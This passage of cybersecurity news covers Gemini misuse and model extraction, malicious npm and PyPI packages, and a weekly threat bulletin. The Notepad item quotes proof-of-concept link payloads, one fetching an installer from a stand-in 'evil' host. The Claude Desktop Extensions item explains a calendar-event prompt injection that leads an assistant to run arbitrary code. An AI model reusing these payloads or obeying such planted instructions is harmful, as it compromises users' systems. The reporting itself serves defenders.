Gemini is getting better at recognizing persona-based tricks and responding safely. As we observe new threat activity, we work to strengthen those guard rails.” Google also said it detected a malware called HONESTCUE that leverages Gemini’s API to outsource functionality generation for the next-stage, along with an AI-generated phishing kit codenamed COINBAIT that’s built using Lovable AI and masquerades as a cryptocurrency exchange for credential harvesting. Some aspects of COINBAIT-related activity have been attributed to a financially motivated threat cluster dubbed UNC5356. “HONESTCUE is a downloader and launcher framework that sends a prompt via Google Gemini’s API and receives C# source code as the response,” it said.

“However, rather than leveraging an LLM to update itself, HONESTCUE calls the Gemini API to generate code that operates the ‘stage two’ functionality, which downloads and executes another piece of malware.” The fileless secondary stage of HONESTCUE then takes the generated C# source code received from the Gemini API and uses the legitimate .NET CSharpCodeProvider framework to compile and execute the payload directly in memory, thereby leaving no artifacts on disk. Google has also called attention to a recent wave of ClickFix campaigns that leverage the public sharing feature of generative AI services to host realistic-looking instructions to fix a common computer issue and ultimately deliver information-stealing malware. The activity was flagged in December 2025 by Huntress. Lastly, the company said it identified and disrupted model extraction attacks that are aimed at systematically querying a proprietary machine learning model to extract information and build a substitute model that mirrors the target’s behavior.

In a large-scale attack of this kind, Gemini was targeted by over 100,000 prompts that posed a series of questions aimed at replicating the model’s reasoning ability across a broad range of tasks in non-English languages. Last month, Praetorian devised a PoC extraction attack where a replica model achieved an accuracy rate of 80.1% simply by sending a series of 1,000 queries to the victim’s API and recording the outputs and training it for 20 epochs . “Many organizations assume that keeping model weights private is sufficient protection,” security researcher Farida Shafik said . “But this creates a false sense of security.

In reality, behavior is the model. Every query-response pair is a training example for a replica. The model’s behavior is exposed through every API response.” Google, which launched the AI Cyber Defense Initiative in 2024, has noted that AI offers the best opportunity to reverse the Defender’s Dilemma and tilt the cybersecurity scales in favor of defenders. “Everyone is looking to increase productivity with automation.

Adversaries are increasingly seeing value from AI,” Miller said. “They are using AI routinely and they are building capabilities with it, so it is easy to predict that we will see an increase in the quality, quantity and speed of AI-enabled attacks. Defenders need to prepare for the future and make similar investments in AI, and build towards AI-enabled defensive capabilities that can operate at machine speed.” (The story was updated after publication to include responses from GTIG.) Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems

Cybersecurity researchers have discovered a fresh set of malicious packages across npm and the Python Package Index (PyPI) repository linked to a fake recruitment-themed campaign orchestrated by the North Korea-linked Lazarus Group. The coordinated campaign has been codenamed graphalgo in reference to the first package published in the npm registry. It’s assessed to be active since May 2025. “Developers are approached via social platforms like LinkedIn and Facebook, or through job offerings on forums like Reddit,” ReversingLabs researcher Karlo Zanki said in a report.

“The campaign includes a well-orchestrated story around a company involved in blockchain and cryptocurrency exchanges.” Notably, one of the identified npm packages, bigmathutils, attracted more than 10,000 downloads after the first, non-malicious version was published, and before the second version containing a malicious payload was released. The names of the packages are listed below - npm - graphalgo graphorithm graphstruct graphlibcore netstruct graphnetworkx terminalcolor256 graphkitx graphchain graphflux graphorbit graphnet graphhub terminal-kleur graphrix bignumx bignumberx bignumex bigmathex bigmathlib bigmathutils graphlink bigmathix graphflowx PyPI - graphalgo graphex graphlibx graphdict graphflux graphnode graphsync bigpyx bignum bigmathex bigmathix bigmathutils As with many job-focused campaigns conducted by North Korean threat actors, the attack chain begins with establishing a fake company like Veltrix Capital in the blockchain and cryptocurrency trading space, and then setting up the necessary digital real estate to create an illusion of legitimacy. This includes registering a domain and creating a related GitHub organization to host several repositories for use in coding assessments. The repositories have been found to contain projects based on Python and JavaScript.

“Examination of these repositories didn’t reveal any obvious malicious functionality,” Zanki said. “That is because the malicious functionality was not introduced directly via the job interview repositories, but indirectly – through dependencies hosted on the npm and PyPI open-source package repositories.” The idea behind setting up these repositories is to trick candidates who apply to its job listings on Reddit and Facebook Groups into running the projects on their machines, effectively installing the malicious dependency and triggering the infection. In some cases, victims are directly contacted by seemingly legitimate recruiters on LinkedIn. The packages ultimately act as a conduit to deploy a remote access trojan (RAT) that periodically fetches and executes commands from an external server.

It supports various commands to gather system information, enumerate files and directories, list running processes, create folders, rename files, delete files, and upload/download files. Interestingly, the command-and-control (C2) communication is protected by a token-based mechanism to ensure that only requests with a valid token are accepted. The approach was previously observed in 2023 campaigns linked to a North Korean hacking group called Jade Sleet, which is also known as TraderTraitor or UNC4899. It essentially works like this: the packages send system data as part of a registration step to the C2 server, which responds with a token.

This token is then sent back to the C2 server in subsequent requests to establish that they are originating from an already registered infected system. “The token-based approach is a similarity […] in both cases and has not been used by other actors in malware hosted on public package repositories as far as we know,” Zanki told The Hacker News at that time. The findings show that North Korean state-sponsored threat actors continue to poison open-source ecosystems with malicious packages in hopes of stealing sensitive data and conducting financial theft, a fact evidenced by the RAT’s checks to determine if the MetaMask browser extension is installed in the machine. “Evidence suggests that this is a highly sophisticated campaign,” ReversingLabs said.

“Its modularity, long-lived nature, patience in building trust across different campaign elements, and the complexity of the multilayered and encrypted malware point to the work of a state-sponsored threat actor.” More Malicious npm Packages Found The disclosure comes as JFrog uncovered a sophisticated, malicious npm package called “duer-js” published by a user named “luizaearlyx.” While the library claims to be a utility to “make the console window more visible,” it harbors a Windows information stealer called Bada Stealer. It’s capable of gathering Discord tokens, passwords, cookies, and autofill data from Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser, cryptocurrency wallet details, and system information. The data is then exfiltrated to a Discord webhook, as well as the Gofile file storage service as a backup. “In addition to stealing information from the host it infected, the malicious package downloads a secondary payload,” security researcher Guy Korolevski said .

“This payload is designed to run on the Discord Desktop app startup, with self-updating capabilities, stealing directly from it, including payment methods used by the user.” It also coincides with the discovery of another malware campaign that weaponizes npm to extort cryptocurrency payments from developers during package installation using the “npm install” command. The campaign, first recorded on February 4, 2026, has been dubbed XPACK ATTACK by OpenSourceMalware. duer-js malicious package flow, hijacking Discord’s Electron environment The names of the packages, all uploaded by a user named “dev.chandra_bose,” are listed below - xpack-per-user xpack-per-device xpack-sui xpack-subscription xpack-arc-gateway xpack-video-submission test-npm-style xpack-subscription-test testing-package-xdsfdsfsc “Unlike traditional malware that steals credentials or executes reverse shells, this attack innovatively abuses the HTTP 402 ‘Payment Required’ status code to create a seemingly legitimate payment wall,” security researcher Paul McCarty said . “The attack blocks installation until victims pay 0.1 USDC/ETH to the attacker’s wallet, while collecting GitHub usernames and device fingerprints.” “If they refuse to pay, the installation simply fails after wasting 5+ minutes of their development time, and they may not even realize they’ve encountered malware versus what appeared to be a legitimate paywall for package access.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: AI Prompt RCE, Claude 0-Click, RenEngine Loader, Auto 0-Days & 25+ Stories

Threat activity this week shows one consistent signal — attackers are leaning harder on what already works. Instead of flashy new exploits, many operations are built around quiet misuse of trusted tools, familiar workflows, and overlooked exposures that sit in plain sight. Another shift is how access is gained versus how it’s used. Initial entry points are getting simpler, while post-compromise activity is becoming more deliberate, structured, and persistent.

The objective is less about disruption and more about staying embedded long enough to extract value. There’s also growing overlap between cybercrime, espionage tradecraft, and opportunistic intrusion. Techniques are bleeding across groups, making attribution harder and defense baselines less reliable. Below is this week’s ThreatsDay Bulletin — a tight scan of the signals that matter, distilled into quick reads.

Each item adds context to where threat pressure is building next. Notepad RCE via Markdown Links Microsoft Patches Notepad Flaw Microsoft has patched a command injection flaw ( CVE-2026-20841 , CVSS score: 8.8) in its Notepad app that could result in remote code execution. “Improper neutralization of special elements used in a command (‘command injection’) in Windows Notepad App allows an unauthorized attacker to execute code over a network,” Microsoft said. An attacker could exploit this flaw by tricking a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to run remote files.

“The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user,” the tech giant added. Proof-of-concept (PoC) exploits show that the vulnerability can be triggered by creating a Markdown file with “file://” links that point to executable files (“file://C:/windows/system32/cmd.exe”) or contain special URIs (“ms-appinstaller://?source=https://evil/xxx.appx”) to run arbitrary payloads. The issue was fixed as part of its monthly Patch Tuesday update this week. Microsoft added Markdown support to Notepad on Windows 11 last May.

APT Pressure Intensifies on Taiwan Taiwan Becomes Target of APT Attacks TeamT5 said tracked more than 510 advanced persistent threat (APT) operations affecting 67 countries globally in 2025, out of which 173 attacks targeted Taiwan. “Taiwan’s role in geopolitical tensions and values in the global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives,” the security vendor said . “Taiwan is more than just a target – it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.” Last year, TeamT5 also exposed a likely Chinese intelligence operation associated with the Chinese technology company Smiao Intelligence that used fake consulting companies to recruit individuals in the U.S. and Taiwan as part of a suspected data gathering mission.

Node.js Stealer Hits Windows LTX Stealer Targets Windows Systems A new Node.js information stealer named LTX Stealer has been spotted in the wild. Targeting Windows systems and distributed via a heavily obfuscated Inno Setup installer, the malware conducts large-scale credential harvesting from Chromium-based browsers, targets cryptocurrency-related artifacts, and stages the collected data for exfiltration. “The campaign relies on a cloud-backed management infrastructure, where Supabase is used exclusively as the authentication and access-control layer for the operator panel, while Cloudflare is leveraged to front backend services and mask infrastructure details,” CYFIRMA said . Marco Stealer Expands Data Theft Marco Stealer Emerges in the Wild Another new Windows-oriented information stealer is Marco Stealer, which was first observed in June 2025.

Delivered via a downloader in a ZIP archive, it mainly targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim’s system. “Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker,” Zscaler ThreatLabz said . “Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.” Telegram Sessions Hijacked via OAuth Abuse Social Engineering Campaign Targets Telegram Accounts A new account takeover campaign has been observed abusing Telegram’s native authentication workflows to obtain fully authorized user sessions.

In one variant, victims are prompted to scan a QR code on bogus sites using the Telegram mobile application, initiating a legitimate Telegram login attempt tied to attacker-controlled API credentials. Telegram then sends an in-app authorization prompt to the victim’s existing session. Alternatively, users can also enter their country code, phone number, and verification code (if enabled) on a fake web page, which causes the data to be relayed to Telegram’s official authentication APIs. Upon successful verification, Telegram issues an in-app authorization request as before.

“Unlike traditional phishing attacks that rely solely on credential harvesting or token replay, this campaign leverages attacker-controlled Telegram API credentials and integrates directly with Telegram’s legitimate login and authorization infrastructure,” CYFIRMA noted . “By inducing victims to approve in-app authorization prompts under false pretenses, the attackers achieve complete session compromise while minimizing technical anomalies and user suspicion.” Discord Expands Global Age Checks Discord Announces Age Verification Plans Discord has announced it will require all users globally to verify their ages by sharing video selfies or providing government IDs to access certain content. Additionally, it will implement an age inference model, a new system that runs in the background to help determine whether an account belongs to an adult, without always requiring users to verify their age. The company has assured that video selfies don’t leave a user’s device, that identity documents submitted to third-party vendors, in this case k-ID, are “deleted quickly” or “immediately” after age confirmation, and that a user’s age verification status cannot be seen by other users.

However, concerns have been raised about whether Discord can be trusted with their most sensitive information, especially in the aftermath of a security breach of a third-party service that Discord previously relied on to verify ages in the U.K. and Australia. The incident led to the theft of government IDs of 70,000 Discord users. In a statement given to Ars Technica, k-ID said the age estimation technology runs entirely on device and no third-parties store personal data shared during age checks.

The move comes at a time when laws requiring age verification on social media platforms are being adopted across the world. Discord confirmed that “a phased global rollout” would begin in “early March,” at which point all users globally would be defaulted to “teen-appropriate” experiences. GuLoader Refines Evasion Tradecraft GuLoader Continues to Evolve A new analysis of the GuLoader malware has revealed that it employs polymorphic code to dynamically construct constants during execution and exception-based control flow obfuscation to conceal its functionality and evade detection. Besides introducing sophisticated exception-handling mechanisms to complicate analysis, the malware attempts to bypass reputation-based rules by hosting payloads on trusted cloud services such as Google Drive and OneDrive.

First observed in December 2019, GuLoader serves primarily as a downloader for Remote Access Trojans (RATs) and information stealers. $73.6M Pig-Butchering Scam Sentence Man Sentenced to 20 Years in Prison for Crypto Scam Daren Li, 42, a dual national of China and St. Kitts and Nevis has been sentenced in absentia in the U.S. to the statutory maximum of 20 years in prison and three years of supervised release for his international cryptocurrency investment scheme known as pig butchering or romance baiting that defrauded victims of more than $73.6 million.

Li pleaded guilty to his crime in November 2024. However, the defendant cut off his ankle monitor and fled the country in December 2025. His present whereabouts are unknown. “As part of his plea agreement, Li admitted that unindicted members of the conspiracy would contact victims directly through unsolicited social-media interactions, telephone calls and messages, and online dating services,” the U.S.

Justice Department said . “The unindicted co-conspirators would gain the trust of victims by establishing either professional or romantic relationships with them, often communicating by electronic messages sent via end-to-end encrypted applications.” The co-conspirators established spoofed domains and websites that resembled legitimate cryptocurrency trading platforms and tricked victims into investing in cryptocurrency through these fraudulent platforms after gaining their trust. Li also confessed that he would direct co-conspirators to open U.S. bank accounts established on behalf of 74 shell companies and would monitor the receipt of interstate and international wire transfers of victim funds.

“Li and other co-conspirators would receive victim funds in financial accounts that they controlled and then monitor the conversion of victim funds to virtual currency,” the department said. 0-Click AI Prompt RCE Risk 0-Click Flaw in Claude Desktop Extensions A zero-click remote code execution vulnerability (CVSS score: 10.0) in Claude Desktop Extensions (DXT) could be exploited to silently compromise a system by a simple Google Calendar event when a user issues a harmless prompt like “Please check my latest events in google cal[endar] and then take care of it for me.” The problem stems from how MCP-based systems like Claude DXT autonomously chain together different tools and external connectors to fulfil user requests without enforcing proper security boundaries. The phrase “take care of it” does the heavy lifting here, as the artificial intelligence (AI) assistant interprets it as a justification to execute arbitrary instructions embedded in those events without seeking users’ permission. The flaw impacts more than 10,000 active users and 50 DXT extensions, according to LayerX.

“Unlike traditional browser extensions, Claude Desktop Extensions run unsandboxed with full system privileges,” the browser security company said . “As a result, Claude can autonomously chain low-risk connectors (e.g., Google Calendar) to high-risk local executors, without user awareness or consent. If exploited by a bad actor, even a benign prompt (‘take care of it’), coupled with a maliciously worded calendar event, is sufficient to trigger arbitrary local code execution that compromises the entire system.” Anthropic has opted not to fix the issue at this time. A similar Google Gemini prompt injection flaw was disclosed by Miggo Security last month.

Data-Theft Ransomware Surges Coinbase Cartel Claims Over 60 Victims A nascent ransomware group called Coinbase Cartel has claimed more than 60 victims since it first emerged in September 2025. “Coinbase Cartel operations are marked by an insistence on stealing data while leaving systems available rather than complementing data theft with the use of encryptors that prohibit system access,” Bitdefender said . The healthcare, technology, and transportation industries represent a major chunk of Coinbase Cartel’s greatest victim demographic to date. The healthcare organizations impacted by the threat actor are primarily based in the U.A.E.

Some of the other prominent groups that are focused on only data theft are World Leaks and PEAR (Pure Extraction and Ransom). The development paints a picture of an ever-evolving ransomware landscape populated by new and old actors, even as the threat is getting increasingly professionalized as attackers streamline operations. According to data from Cyble, 6,604 ransomware attacks were recorded in 2025, up 52% from the 4,346 attacks claimed by ransomware groups in 2024. Google Expands Privacy Takedowns Google Adds New Options “Results about you” Google has expanded its “Results about you” tool to give users more control over sensitive personal information and added a way to request removal of non-consensual explicit images from search results, as well as other details like driver’s license numbers, passport numbers, and Social Security numbers.

“We understand that removing existing content is only part of the solution,” Google said . “For added protection, the new process allows you to opt in to safeguards that will proactively filter out any additional explicit results that might appear in similar searches.” Monitoring Tools Used for Ransomware Crazy Ransomware Gang Abuses Net Monitor and SimpleHelp Threat actors have been observed leveraging Net Monitor, a commercial workforce monitoring tool, with SimpleHelp, a legitimate remote monitoring and management (RMM) platform, as part of attacks designed to deploy Crazy ransomware. The two incidents, believed to be the work of the same threat actor, took place in January and February 2026. Net Monitor comes with various capabilities that go beyond employee productivity tracking, including reverse shell connections, remote desktop control, file management, and the ability to customize service and process names during installation.

These features, coupled with SimpleHelp’s remote access functionality, make them attractive tools for attackers looking to blend into enterprise environments without deploying traditional malware. What’s more, Net Monitor for Employees Professional bundles a pseudo-terminal (“winpty-agent.exe”) that facilitates full command execution. Bad actors have been found to leverage this aspect to conduct reconnaissance, deliver additional payloads, and deploy secondary remote access channels, turning it into a functional remote access trojan. “In the cases observed, threat actors used these two tools together, using Net Monitor for Employees as a primary remote access channel and SimpleHelp as a redundant persistence layer, ultimately leading to the attempted deployment of Crazy ransomware,” Huntress said .

0APT Victim Claims Questioned 0APT’s 200 Victim Count Likely a Hoax A threat actor called 0APT appears to be falsely claiming that it has breached over 200 victims within a span of a week since launching their data leak site on January 28, 2026. Further analysis has determined that the victims are a blend of wholly fabricated generic company names and recognizable organizations that threat actors have not breached, GuidePoint’s Research and Intelligence Team said. The data leak site went offline on February 8, 2026, before resurfacing the next day with a list of more than 15 very large multinational organizations. “0APT is likely operating in this deceptive manner in order to support extortion of uninformed victims, re-extortion of historical victims from other groups, defrauding of potential affiliates, or to garner interest in a nascent RaaS group,” security researcher Jason Baker noted .

While signs suggest that the group may be bluffing about its victim count, the Windows and Linux ransomware samples have been found to be fully operational, per Halcyon . It’s worth pointing out that ransomware groups like RansomedVC have listed fabricated attacks on their data leak sites to deceive victims. Viewed in that light, 0APT’s exaggerated claims are likely an attempt to gain visibility and momentum among its peers. Its origins remain unknown.

SYSTEM RCE via Named Pipe Flaw in Quest Desktop Authority Detailed A high-risk security vulnerability ( CVE-2025-67813 , CVSS score: 5.3) within Quest Desktop Authority could allow attackers to execute remote code with SYSTEM privileges. “Quest KACE Desktop Authority exposes a named pipe (ScriptLogic_Server_NamedPipe_9300) running as SYSTEM that accepts connections from any authenticated domain user over the network,” NetSPI said . The named pipe implements a custom IPC protocol that supports dangerous operations, including arbitrary command execution, DLL injection, credential retrieval, and COM object invocation. Any authenticated user on the network can achieve remote code execution as a local administrator on hosts running the Desktop Authority agent.

AI Traffic Scans to Block VPNs Russia to Analyze Internet Traffic Using AI to Flag VPN Usage Russia’s internet watchdog will use artificial intelligence (AI) technology to analyze internet traffic and restrict the operation of VPN services, Forbes Russia reported . The Roskomnadzor is expected to spend close to $30 million to develop the internet traffic filtering mechanism this year. The Russian government has blocked access to tens of VPN apps in recent years. It also maintains a registry of banned websites.

Mispadu Expands Banking Attacks Mexico and Brazil Targeted by Mispadu Trojan Cofense said it has observed Mispadu campaigns targeting Latin America, particularly Mexico and Brazil, and to a lesser extent in Spain, Italy, and Portugal, with phishing emails containing HTML Application (HTA) attachments that are designed to bypass Secure Email Gateways (SEGs) to reach the inboxes of employees across the world. “The only variation is that sometimes the URL delivering the HTA files is embedded in an attached, password-protected PDF rather than embedded in the email itself,” Cofense said . “In all recent campaigns, Mispadu makes use of an AutoIT loader and various legitimate files to run the malicious content. Each step of the delivery chain from the attached PDF to the AutoIT script is dynamically generated.

This means that every hash except for the AutoIT compiler is unique to each install, further frustrating EDR.” Recent iterations of the banking trojan come with the ability to self-propagate on infected hosts via email and expand the target online banking websites to include banks outside of Latin America as well as cryptocurrency-based exchanges. ScreenConnect Deployed via Phish Phishing Campaign Delivers ConnectWise ScreenConnect for Remote Access In a phishing campaign documented by Forcepoint, spoofed emails have been found to deliver a malicious .cmd attachment that escalates privileges, disables Windows SmartScreen, removes the mark-of-the-web (MotW) to bypass security warnings, and ultimately installs ConnectWise ScreenConnect. The campaign has targeted organizations across the U.S., Canada, the U.K., and Northern Ireland, focusing on sectors with high-value data, including government, healthcare, and logistics companies. Recent phishing attacks have also abused web services from Amazon, like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Services (AWS) Amplify to slip past email security controls and launch credential phishing attacks.

Other phishing attacks have embraced uncommon techniques like using edited versions of legitimate business emails to deliver convincingly spoofed emails to recipients. “These emails work by having the threat actor create an account on a legitimate service and input arbitrary text into a field that will later be included in outgoing emails,” Cofense said . “After this is done, the threat actor would need to receive a legitimate email that happens to include the malicious text that was created by the threat actor. Once the email is received, the threat actor can then redirect the email to the intended victims.” CrashFix Delivers SystemBC CrashFix Variant Attack Delivers Python Implants and SystemBC A variant of the ClickFix attack called CrashFix has been used to deliver malicious payloads consistent with a known malware called SystemBC.

Unlike the CrashFix-style social engineering flow documented by Huntress and Microsoft , the attack stands out because it did not involve the use of a malicious browser extension. “Instead, the victim was convinced to execute a command via the Windows Run dialog (Win+R) as seen with traditional ClickFix,” Binary Defense said . “This command abused a legitimate Windows binary – finger.exe – copied from System32, renamed, and executed from a user-writable directory. The output of this execution was piped directly into cmd.exe, acting as a delivery mechanism for an obfuscated PowerShell payload.” The PowerShell code then retrieves follow-on content, including Python backdoors and a DLL implant that overlaps with SystemBC, from attacker-controlled infrastructure, while taking steps to fingerprint the host and clean up artifacts on disk.

“The coexistence of Python backdoors and a reflective DLL implant highlights a deliberate defense-evasion and persistence strategy,” the company said. “By mixing scripting-based and native implants, the attacker reduced reliance on any single execution method, making complete eviction more difficult.” 76 Zero-Days Found in Cars Pwn2Own Automotive 2026 Finds 76 Zero-days The third annual Pwn2Own Automotive competition held in Tokyo, Japan, late last month uncovered 76 unique zero-day vulnerabilities in a variety of targets, such as in-vehicle infotainment (IVI) systems (Tesla), electric vehicle (EV) chargers (Alpitronic HYC50, ChargePoint Home Flex), and car operating systems (Automotive Grade Linux). Team Fuzzware.io won the hacking competition with total winnings of $215,000, followed by Team DDOS with $100,750 and Synactiv with $85,000. Bing Ads Funnel Tech Scams Fake Bing Ads Lead to Tech Support Scams Malicious ads served on Bing search results when searching for sites like Amazon are being used to redirect unsuspecting users to tech support scam links hosted in Azure Blob Storage.

The campaign targeted healthcare, manufacturing, and technology sectors in the U.S. “Clicking on the malicious ad sent the victims to highswit[.]space, a newly registered domain hosting an empty WordPress site, which then redirected them to one of the Azure Blob Storage containers, which served a typical tech support scam site,” Netskope Threat Labs said . Chinese VPN Infra Footprint Expands Chinese VPN Used by Devices in Russia, China, Myanmar, Iran, and Venezuela A Chinese virtual private network (VPN) provider named LVCHA VPN has been used by devices in Russia, China, Myanmar, Iran, and Venezuela. It also has an Android app that’s directly hosted on its website (“lvcha[.]in”) and distributed via the Google Play Store .

Further analysis of the domain has uncovered a cluster of nearly 50 suspicious domains, all of which promote the same VPN. “Whenever we see campaigns promoting suspicious downloads or products using so many domains, it can indicate that the operator is rotating domains to work around country-level firewalls in regions where they’re trying to promote distribution,” Silent Push said . Grid Attack Triggers Western Alerts U.K. and U.S.

Issue Warning After Poland Energy Grid Cyber Attack Following a late December 2025 coordinated cyber attack on Poland’s power grid , the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published a bulletin for critical infrastructure owners and operators. CISA said vulnerable edge devices remain a prime target for threat actors, OT devices without firmware verification can be permanently damaged, and threat actors leverage default credentials to pivot onto the HMI and RTUs. “Operators should prioritize updates that allow firmware verification when available,” the agency added .

“Operators should immediately change default passwords and establish requirements for integrators or OT suppliers to enforce password changes in the future.” In a similar development, Jonathan Ellison, director for national resilience at the National Cyber Security Centre (NCSC), has urged critical infrastructure operators in the country to act now and have incident response plans or playbooks in place to respond to such threats. “Although attacks can still happen, strong resilience and recovery plans reduce both the chances of an attack succeeding and the impact if one does,” Ellison said . Telnet Traffic Abruptly Collapses Global Telnet Traffic Dropped in Mid-January 2026 Threat intelligence firm GreyNoise said it observed a steep decline in global Telnet traffic on January 14, 2026, six days before a security advisory for CVE-2026-24061 went public on January 20. CVE-2026-24061 relates to a critical vulnerability in the GNU InetUtils telnet daemon that could result in an authentication bypass.

Data gathered by GreyNoise shows that the hourly volume of Telnet sessions dropped 65% on January 14 at 21:00 UTC, then fell 83% within two hours. Daily sessions have declined from an average of 914,000 (from December 1, 2025, to January 14, 2026) to around 373,000, equating to a 59% reduction that has persisted as of February 10, 2026. “Eighteen ASNs with significant pre-drop telnet volume (>50K sessions each) went to absolute zero after January 15,” the company said. “Five entire countries vanished from GreyNoise telnet data: Zimbabwe, Ukraine, Canada, Poland, and Egypt.

Not reduced to zero.” Among the 18 ASNs included were British Telecom, Charter/Spectrum, Cox Communications, and Vultr. Although correlation does not imply causation, GreyNoise has raised the possibility that the telecom operators likely received advance warning about CVE-2026-24061, allowing them to act on it at the infrastructure level. “A backbone or transit provider — possibly responding to a coordinated request, possibly acting on their own assessment — implemented port 23 filtering [to block telnet traffic] on transit links,” it said . New Loaders Fuel Stealer Campaigns New RenEngine and Foxveil Malware Loaders Spotted Cyderes and Cato Networks have detailed new previously undocumented malware loaders dubbed RenEngine Loader and Foxveil that have been used to deliver next-stage payloads.

The Foxveil malware campaign has been active since August 2025. It’s engineered to establish an initial foothold, complicate analysis efforts, and retrieve next-stage shellcode payloads from threat actor-controlled staging hosted on trusted platforms like Cloudflare Pages, Netlify, and Discord. Attacks leveraging RenEngine Loader, on the other hand, have employed illegally modified game installers distributed via piracy platforms to deliver the malware alongside the playable content. More than 400,000 global victims are estimated to have been impacted, with most of them located in India, the U.S., and Brazil.

The activity has been operational since April 2025. “RenEngine Loader decrypts, stages, and transfers execution to Hijack Loader , enabling rapid tooling evolution and flexible capability deployment,” Cyderes said. “By embedding a modular, stealth-focused second-stage loader inside a legitimate Ren’Py launcher, the attackers closely mimic normal application behavior, significantly reducing early detection.” The end goal of the attack is to deploy an information stealer called ACR Stealer . Looker RCE Chain Disclosed Flaws in Google Looker Two novel security vulnerabilities have been disclosed in Google Looker that could be exploited by an attacker to fully compromise a Looker instance.

This includes a remote code execution (RCE) chain via Git hook overrides and an authorization bypass flaw via internal database connection abuse. Successful exploitation of the flaws could allow an attacker to run arbitrary code on the Looker server, potentially leading to cross-tenant access, as well as exfiltrate the full internal MySQL database via error-based SQL injection, according to Tenable . “The vulnerabilities allowed users with developer permissions in Looker to access both the underlying system hosting Looker, and its internal database,” Google said . Collectively tracked as CVE-2025-12743, aka LookOut (CVSS score: 6.5), they were patched by Google in September 2025.

While the fixes have been applied to cloud instances, users of self-hosted Looker instances are advised to update to the latest supported version. Trojanized 7-Zip Spreads Proxyware Malicious 7-Zip Site Distributes Fake Installer with Proxy A fake installer for the 7-Zip file archiver tool downloaded from 7zip[.]com (the legitimate domain is 7-zip[.]org) is being used to drop a proxy component that enrolls the infected host into a residential proxy node. This allows third parties to route traffic through the victim’s IP address while concealing their own origins. The installer is digitally signed with a now-revoked certificate originally issued to Jozeal Network Technology Co., Limited.

The campaign has been codenamed upStage Proxy by security researcher Luke Acha, who discovered it late last month. “The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of 7-Zip File Manager alongside a concealed malware payload,” Malwarebytes said . The 7-Zip lure appears to be part of a broader effort that uses trojanized installers for HolaVPN, TikTok, WhatsApp, and Wire VPN. Attack chains involve using YouTube tutorials as a malware distribution vector to direct unsuspecting users to the bogus site, once again highlighting the abuse of trusted platforms.

AI-Built VoidLink Expands Reach More Details About VoidLink Emerge VoidLink is a sophisticated Linux-based command-and-control (C2) framework capable of long-term intrusion across cloud and enterprise environments. First documented by Check Point last month, ongoing analyses of the malware have revealed that it may have been developed by a Chinese-speaking developer using an artificial intelligence (AI) model with limited human review. Ontinue, in a report published this week, said it found “strong indicators” that the implant was built using a large language model (LLM) coding agent. “It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials from environment variables, config directories, and instance metadata APIs,” security researcher Rhys Downing said .

“It detects container runtimes and includes plugins for container escape and Kubernetes privilege escalation. A kernel-level rootkit adapts its stealth approach based on the host’s kernel version.” Cisco Talos said it has observed the modular framework in campaigns undertaken by a new threat actor codenamed UAT-9921, which is believed to have been active since 2019. The cybersecurity company said it also found “clear indications” of a Windows equivalent of VoidLink that comes with the ability to load plugins. “UAT-9921 uses compromised hosts to install VoidLink command and control (C2), which are then used to launch scanning activities both internal and external to the network,” Talos researchers said .

Taken together, these developments show how threat actors are balancing speed with patience — moving fast where defenses are weak, and slowing down where stealth matters more than impact. The result is activity that blends into normal operations until damage is already underway. For defenders, the challenge isn’t just blocking entry anymore. It’s recognizing misuse of legitimate access, spotting abnormal behavior inside trusted systems, and closing gaps that don’t look dangerous on the surface.

The briefs that follow aren’t isolated incidents. They’re fragments of a wider operating picture — one that keeps evolving week after week. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The CTEM Divide: Why 84% of Security Programs Are Falling Behind

A new 2026 market intelligence study of 128 enterprise security decision-makers ( available here ) reveals a stark divide forming between organizations – one that has nothing to do with budget size or industry and everything to do with a single framework decision. Organizations implementing Continuous Threat Exposure Management (CTEM) demonstrate 50% better attack surface visibility, 23-point higher solution adoption, and superior threat awareness across every measured dimension. The 16% who’ve implemented it are pulling away. The 84% who haven’t are falling behind.

The Demographics of the Divide The research surveyed a senior cohort: 85% of respondents are Manager-level or above, representing organizations where 66% employ 5,000+ people across finance, healthcare, and retail sectors. Download the full research here → What is CTEM? If you aren’t familiar, CTEM involves shifting from “patch everything reactively” to “continuously discover, validate, and prioritize risk exposures that can actually hurt the business.” It’s widely discussed in cybersecurity now as a next-generation evolution of exposure/risk management, and the new report reinforces Gartner’s view that businesses adopting it will consistently demonstrate stronger security outcomes than those that don’t. Awareness Is High.

Adoption Is Rare. One surprising finding: There doesn’t seem to be a problem with awareness, just implementation. 87% of security leaders recognize the importance of CTEM, but only 16% have translated that awareness into operational reality. So, if they’ve heard of it, why aren’t they using it?

The gap between awareness and implementation reveals modern security’s central dilemma: which priority wins? Security leaders understand the CTEM conceptually but struggle to sell its benefits in the face of organizational inertia, competing priorities, and budget constraints that force impossible tradeoffs. The challenge of gaining management buy-in is one reason why we prepared

this report

to provide the statistics that make the business case impossible to ignore. Complexity is the New Multiplier For example: Beyond a certain threshold, manual tracking of all the additional integrations, scripts, and dependencies breaks down, ownership blurs, and blind spots multiply.

The research makes it clear that attack surface complexity is not just a management challenge; it’s a direct risk multiplier. We can see this clearly in the graph below. Attack rates rise linearly from 5% (0-10 domains) to 18% (51-100 domains), then rise steeply past 100 domains. This sudden increase is driven by the ‘visibility gap’, the gulf between the assets a company is responsible for monitoring and those it’s aware of.

